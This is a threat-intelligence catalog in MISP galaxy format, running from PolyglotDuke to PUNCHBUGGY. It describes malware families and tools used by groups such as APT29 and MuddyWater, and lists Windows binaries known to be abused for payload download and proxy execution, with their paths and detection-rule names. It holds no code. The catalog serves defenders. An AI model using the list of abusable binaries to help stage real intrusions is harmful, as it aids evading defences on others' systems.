Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0012 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
PolyglotDuke
PolyglotDuke is a downloader that has been used by APT29 since at least 2013. PolyglotDuke has been used to drop MiniDuke.[ESET Dukes October 2019]
Internal MISP references
UUID 3b7179fa-7b8b-4068-b224-d8d9c642964d which can be used as unique global reference for PolyglotDuke in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0518 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Pony
Pony is a credential stealing malware, though has also been used among adversaries for its downloader capabilities. The source code for Pony Loader 1.0 and 2.0 were leaked online, leading to their use by various threat actors.[Malwarebytes Pony April 2016]
Internal MISP references
UUID 555b612e-3f0d-421d-b2a7-63eb2d1ece5f which can be used as unique global reference for Pony in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0453 |
| source | MITRE |
| tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
POORAIM
POORAIM is a backdoor used by APT37 in campaigns since at least 2014. [FireEye APT37 Feb 2018]
Internal MISP references
UUID 1353d695-5bae-4593-988f-9bd07a6fd1bb which can be used as unique global reference for POORAIM in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0216 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
PoshC2
PoshC2 is an open source remote administration and post-exploitation framework that is publicly available on GitHub. The server-side components of the tool are primarily written in Python, while the implants are written in PowerShell. Although PoshC2 is primarily focused on Windows implantation, it does contain a basic Python dropper for Linux/macOS.[GitHub PoshC2]
Internal MISP references
UUID a3a03835-79bf-4558-8e80-7983aeb842fb which can be used as unique global reference for PoshC2 in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['macOS', 'Linux', 'Windows'] |
| software_attack_id | S0378 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
POSHSPY
POSHSPY is a backdoor that has been used by APT29 since at least 2015. It appears to be used as a secondary backdoor used if the actors lost access to their primary backdoors. [FireEye POSHSPY April 2017]
Internal MISP references
UUID b92f28c4-cbc8-4721-ac79-2d8bdf5247e5 which can be used as unique global reference for POSHSPY in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0150 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
PowerDuke
PowerDuke is a backdoor that was used by APT29 in 2016. It has primarily been delivered through Microsoft Word or Excel attachments containing malicious macros. [Volexity PowerDuke November 2016]
Internal MISP references
UUID d9e4f4a1-dd41-424e-986a-b9a39ebea805 which can be used as unique global reference for PowerDuke in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0139 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
PowerLess
PowerLess is a PowerShell-based modular backdoor that has been used by Magic Hound since at least 2022.[Cybereason PowerLess February 2022]
Internal MISP references
UUID 8b9159c1-db48-472b-9897-34325da5dca7 which can be used as unique global reference for PowerLess in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S1012 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Power Loader
Power Loader is modular code sold in the cybercrime market used as a downloader in malware families such as Carberp, Redyms and Gapz. [MalwareTech Power Loader Aug 2013] [WeLiveSecurity Gapz and Redyms Mar 2013]
Internal MISP references
UUID 018ee1d9-35af-49dc-a667-11b77cd76f46 which can be used as unique global reference for Power Loader in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| software_attack_id | S0177 |
| source | MITRE |
| type | ['malware'] |
Powerpnt
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Microsoft Office binary.
Author: Reegun J (OCBC Bank)
Paths: * C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Powerpnt.exe * C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Powerpnt.exe * C:\Program Files (x86)\Microsoft Office\Office16\Powerpnt.exe * C:\Program Files\Microsoft Office\Office16\Powerpnt.exe * C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Powerpnt.exe * C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Powerpnt.exe * C:\Program Files (x86)\Microsoft Office\Office15\Powerpnt.exe * C:\Program Files\Microsoft Office\Office15\Powerpnt.exe * C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Powerpnt.exe * C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Powerpnt.exe * C:\Program Files (x86)\Microsoft Office\Office14\Powerpnt.exe * C:\Program Files\Microsoft Office\Office14\Powerpnt.exe * C:\Program Files (x86)\Microsoft Office\Office12\Powerpnt.exe * C:\Program Files\Microsoft Office\Office12\Powerpnt.exe * C:\Program Files\Microsoft Office\Office12\Powerpnt.exe
Resources: * https://twitter.com/reegun21/status/1150032506504151040 * https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191
Detection: * Sigma: proc_creation_win_lolbin_office.yml * IOC: Suspicious Office application Internet/network traffic[Powerpnt.exe - LOLBAS Project]
Internal MISP references
UUID 155053be-8a2c-4d5e-8206-36d992c5651d which can be used as unique global reference for Powerpnt in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5231 |
| source | Tidal Cyber |
| tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
PowerPunch
PowerPunch is a lightweight downloader that has been used by Gamaredon Group since at least 2021.[Microsoft Actinium February 2022]
Internal MISP references
UUID e7cdaf70-5e28-442a-b34d-894484788dc5 which can be used as unique global reference for PowerPunch in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0685 |
| source | MITRE |
| tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
PowerShower
PowerShower is a PowerShell backdoor used by Inception for initial reconnaissance and to download and execute second stage payloads.[Unit 42 Inception November 2018][Kaspersky Cloud Atlas August 2019]
Internal MISP references
UUID 2ca245de-77a9-4857-ba93-fd0d6988df9d which can be used as unique global reference for PowerShower in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0441 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
POWERSOURCE
POWERSOURCE is a PowerShell backdoor that is a heavily obfuscated and modified version of the publicly available tool DNS_TXT_Pwnage. It was observed in February 2017 in spearphishing campaigns against personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations. The malware was delivered when macros were enabled by the victim and a VBS script was dropped. [FireEye FIN7 March 2017] [Cisco DNSMessenger March 2017]
Internal MISP references
UUID a4700431-6578-489f-9782-52e394277296 which can be used as unique global reference for POWERSOURCE in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0145 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
PowerSploit
PowerSploit is an open source, offensive security framework comprised of PowerShell modules and scripts that perform a wide range of tasks related to penetration testing such as code execution, persistence, bypassing anti-virus, recon, and exfiltration. [GitHub PowerSploit May 2012] [PowerShellMagazine PowerSploit July 2014] [PowerSploit Documentation]
Internal MISP references
UUID 82fad10d-c921-4a87-a533-49def83d002b which can be used as unique global reference for PowerSploit in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0194 |
| source | MITRE |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'e81ba503-60b0-4b64-8f20-ef93e7783796'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
PowerStallion
PowerStallion is a lightweight PowerShell backdoor used by Turla, possibly as a recovery access tool to install other backdoors.[ESET Turla PowerShell May 2019]
Internal MISP references
UUID 837bcf97-37a7-4001-a466-306574fd7890 which can be used as unique global reference for PowerStallion in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0393 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
POWERSTATS
POWERSTATS is a PowerShell-based first stage backdoor used by MuddyWater. [Unit 42 MuddyWater Nov 2017]
Internal MISP references
UUID 39fc59c6-f1aa-4c93-8e43-1f41563e9d9e which can be used as unique global reference for POWERSTATS in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0223 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
POWERTON
POWERTON is a custom PowerShell backdoor first observed in 2018. It has typically been deployed as a late-stage backdoor by APT33. At least two variants of the backdoor have been identified, with the later version containing improved functionality.[FireEye APT33 Guardrail]
Internal MISP references
UUID b3c28750-3825-4e4d-ab92-f39a6b0827dd which can be used as unique global reference for POWERTON in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0371 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
PowerTool
PowerTool is a tool used to remove rootkits, as well as to detect, analyze, and fix kernel structure modifications.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID b8a101e4-e0d2-4002-94c6-18ea30da7aa7 which can be used as unique global reference for PowerTool in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5039 |
| source | Tidal Cyber |
| tags | ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'e1af18e3-3224-4e4c-9d0f-533768474508', '39d6e8b7-6c8a-4ec5-a584-54ca32aa29fb', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
PowGoop
PowGoop is a loader that consists of a DLL loader and a PowerShell-based downloader; it has been used by MuddyWater as their main loader.[DHS CISA AA22-055A MuddyWater February 2022][CYBERCOM Iranian Intel Cyber January 2022]
Internal MISP references
UUID 7ed984bb-d098-4d0a-90fd-b03e68842479 which can be used as unique global reference for PowGoop in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S1046 |
| source | MITRE |
| tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
POWRUNER
POWRUNER is a PowerShell script that sends and receives commands to and from the C2 server. [FireEye APT34 Dec 2017]
Internal MISP references
UUID 67cdb7a6-5142-43fa-8b8d-d9bdd2a4dae4 which can be used as unique global reference for POWRUNER in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0184 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Presentationhost
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: File is used for executing Browser applications
Author: Oddvar Moe
Paths: * C:\Windows\System32\Presentationhost.exe * C:\Windows\SysWOW64\Presentationhost.exe
Resources: * https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf * https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
Detection: * Sigma: proc_creation_win_lolbin_presentationhost_download.yml * Sigma: proc_creation_win_lolbin_presentationhost.yml * IOC: Execution of .xbap files may not be common on production workstations[Presentationhost.exe - LOLBAS Project]
Internal MISP references
UUID 8127f51d-dce0-405a-a785-83883ba19c23 which can be used as unique global reference for Presentationhost in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5141 |
| source | Tidal Cyber |
| tags | ['0661bf1f-76ec-490c-937a-efa3f02bc59b', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Prestige
Prestige ransomware has been used by Sandworm Team since at least March 2022, including against transportation and related logistics industries in Ukraine and Poland in October 2022.[Microsoft Prestige ransomware October 2022]
Internal MISP references
UUID 4fb5b109-5a5c-5441-a0f9-f639ead5405e which can be used as unique global reference for Prestige in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S1058 |
| source | MITRE |
| tags | ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Prikormka
Prikormka is a malware family used in a campaign known as Operation Groundbait. It has predominantly been observed in Ukraine and was used as early as 2008. [ESET Operation Groundbait]
Internal MISP references
UUID 1da989a8-41cc-4e89-a435-a88acb72ae0d which can be used as unique global reference for Prikormka in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0113 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used by Windows to send files to the printer
Author: Oddvar Moe
Paths: * C:\Windows\System32\print.exe * C:\Windows\SysWOW64\print.exe
Resources: * https://twitter.com/Oddvarmoe/status/985518877076541440 * https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410
Detection: * Sigma: proc_creation_win_print_remote_file_copy.yml * IOC: Print.exe retrieving files from internet * IOC: Print.exe creating executable files on disk[Print.exe - LOLBAS Project]
Internal MISP references
UUID 8ad4945d-6c54-4472-a476-906a9860fb82 which can be used as unique global reference for Print in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5142 |
| source | Tidal Cyber |
| tags | ['01aca077-8cfb-4d1d-9b83-3678cd26f050', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
PrintBrm
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Printer Migration Command-Line Tool
Author: Elliot Killick
Paths: * C:\Windows\System32\spool\tools\PrintBrm.exe
Resources: * https://twitter.com/elliotkillick/status/1404117015447670800
Detection: * Sigma: proc_creation_win_lolbin_printbrm.yml * IOC: PrintBrm.exe should not be run on a normal workstation[PrintBrm.exe - LOLBAS Project]
Internal MISP references
UUID 93ec2323-f93b-4d21-9930-f367948187f0 which can be used as unique global reference for PrintBrm in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5143 |
| source | Tidal Cyber |
| tags | ['37a70ca8-a027-458c-9a48-7e0d307462be', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
ProcDump
ProcDump is a tool used to monitor applications for CPU spikes and generate crash dumps.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 0d6e00a3-6237-458a-85e5-1128bd7f4f50 which can be used as unique global reference for ProcDump in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5036 |
| source | Tidal Cyber |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'c3eaf8a7-06e5-4e3a-9615-36316d9e10a8', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Process Hacker
Process Hacker is a tool used to remove rootkits.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID d390ea7d-0995-4069-924d-65d6c7c98e3c which can be used as unique global reference for Process Hacker in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5040 |
| source | Tidal Cyber |
| tags | ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'e1af18e3-3224-4e4c-9d0f-533768474508', '39d6e8b7-6c8a-4ec5-a584-54ca32aa29fb', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
ProLock
ProLock is a ransomware strain that has been used in Big Game Hunting (BGH) operations since at least 2020, often obtaining initial access with QakBot. ProLock is the successor to PwndLocker ransomware which was found to contain a bug allowing decryption without ransom payment in 2019.[Group IB Ransomware September 2020]
Internal MISP references
UUID c8af096e-c71e-4751-b203-70c285b7a7bd which can be used as unique global reference for ProLock in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0654 |
| source | MITRE |
| tags | ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
| type | ['malware'] |
ProtocolHandler
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Microsoft Office binary
Author: Nir Chako
Paths: * C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\ProtocolHandler.exe * C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\ProtocolHandler.exe * C:\Program Files (x86)\Microsoft Office\Office16\ProtocolHandler.exe * C:\Program Files\Microsoft Office\Office16\ProtocolHandler.exe * C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\ProtocolHandler.exe * C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\ProtocolHandler.exe * C:\Program Files (x86)\Microsoft Office\Office15\ProtocolHandler.exe * C:\Program Files\Microsoft Office\Office15\ProtocolHandler.exe
Resources: None Provided
Detection: * Sigma: proc_creation_win_lolbin_protocolhandler_download.yml * IOC: Suspicious Office application Internet/network traffic[ProtocolHandler.exe - LOLBAS Project]
Internal MISP references
UUID 2ecf8041-8069-41a0-b6e8-5b328ae69e31 which can be used as unique global reference for ProtocolHandler in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5232 |
| source | Tidal Cyber |
| tags | ['77131d00-b8b2-42ef-afbd-1fbfc12729df', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Proton
Proton is a macOS backdoor focusing on data theft and credential access [objsee mac malware 2017].
Internal MISP references
UUID d3bcdbc4-5998-4e50-bd45-cba6a3278427 which can be used as unique global reference for Proton in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['macOS'] |
| software_attack_id | S0279 |
| source | MITRE |
| type | ['malware'] |
Provlaunch
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Launcher process
Author: Grzegorz Tworek
Paths: * c:\windows\system32\provlaunch.exe
Resources: * https://twitter.com/0gtweet/status/1674399582162153472
Detection: * Sigma: proc_creation_win_provlaunch_potential_abuse.yml * Sigma: proc_creation_win_provlaunch_susp_child_process.yml * Sigma: proc_creation_win_registry_provlaunch_provisioning_command.yml * Sigma: registry_set_provisioning_command_abuse.yml * IOC: c:\windows\system32\provlaunch.exe executions * IOC: Creation/existence of HKLM\SOFTWARE\Microsoft\Provisioning\Commands subkeys[Provlaunch.exe - LOLBAS Project]
Internal MISP references
UUID 83e1ac24-3928-40ba-b701-d72549a9430c which can be used as unique global reference for Provlaunch in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5144 |
| source | Tidal Cyber |
| tags | ['9e5ec91c-0d0f-4e40-846d-d7b7eb941e17', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Proxysvc
Proxysvc is a malicious DLL used by Lazarus Group in a campaign known as Operation GhostSecret. It has appeared to be operating undetected since 2017 and was mostly observed in higher education organizations. The goal of Proxysvc is to deliver additional payloads to the target and to maintain control for the attacker. It is in the form of a DLL that can also be executed as a standalone process. [McAfee GhostSecret]
Internal MISP references
UUID 94f43629-243e-49dc-8c2b-cdf4fc15cf83 which can be used as unique global reference for Proxysvc in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0238 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
PS1
PS1 is a loader that was used to deploy 64-bit backdoors in the CostaRicto campaign.[BlackBerry CostaRicto November 2020]
Internal MISP references
UUID 8cd401ac-a233-4395-a8ae-d75db9d5b845 which can be used as unique global reference for PS1 in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0613 |
| source | MITRE |
| type | ['malware'] |
PsExec
PsExec is a free Microsoft tool that can be used to execute a program on another computer. It is used by IT administrators and attackers.[Russinovich Sysinternals][SANS PsExec]
Internal MISP references
UUID 73eb32af-4bd3-4e21-8048-355edc55a9c6 which can be used as unique global reference for PsExec in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0029 |
| source | MITRE |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '5cd85fec-0e37-4892-9cd2-bb8c70139072', '0d3ca5b9-2ea9-4daf-b3b5-11f1c6f9ebd3', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '950e8d3a-044b-43e3-b5db-bba61f70ff51', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '15b77e5c-2285-434d-9719-73c14beba8bd', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Psr
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Windows Problem Steps Recorder, used to record screen and clicks.
Author: Leon Rodenko
Paths: * c:\windows\system32\psr.exe * c:\windows\syswow64\psr.exe
Detection: * Sigma: proc_creation_win_psr_capture_screenshots.yml * IOC: psr.exe spawned * IOC: suspicious activity when running with "/gui 0" flag[Psr.exe - LOLBAS Project]
Internal MISP references
UUID 1945584b-bb16-48a2-902d-2a1c9591efcd which can be used as unique global reference for Psr in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5145 |
| source | Tidal Cyber |
| tags | ['08f4ef8d-94bb-42f7-b76d-71bcc809bcc9', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Psylo
Psylo is a shellcode-based Trojan that has been used by Scarlet Mimic. It has similar characteristics as FakeM. [Scarlet Mimic Jan 2016]
Internal MISP references
UUID 8c35d349-2f70-4edb-8668-e1cc2b67e4a0 which can be used as unique global reference for Psylo in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0078 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Pteranodon
Pteranodon is a custom backdoor used by Gamaredon Group. [Palo Alto Gamaredon Feb 2017]
Internal MISP references
UUID 7fed4276-807e-4656-95f5-90878b6e2dbb which can be used as unique global reference for Pteranodon in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0147 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Pubprn
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Proxy execution with Pubprn.vbs
Author: Oddvar Moe
Paths: * C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs * C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs
Resources: * https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/ * https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology * https://github.com/enigma0x3/windows-operating-system-archaeology
Detection: * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * Sigma: proc_creation_win_lolbin_pubprn.yml[Pubprn.vbs - LOLBAS Project]
Internal MISP references
UUID 58883c83-d5be-42fc-b4bd-9287e55cd499 which can be used as unique global reference for Pubprn in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5260 |
| source | Tidal Cyber |
| tags | ['8177e8ac-f80d-477d-b0af-c2ea243ddf00', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Pulseway
According to joint Cybersecurity Advisory AA23-320A (November 2023), Pulseway is a publicly available, legitimate tool that "enables remote monitoring and management of systems". According to the Advisory, Scattered Spider threat actors are known to abuse the tool during their intrusions.[U.S. CISA Scattered Spider November 16 2023]
Internal MISP references
UUID 74eb97b8-fc2c-41f0-b497-aad08a52777e which can be used as unique global reference for Pulseway in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5068 |
| source | Tidal Cyber |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
PUNCHBUGGY
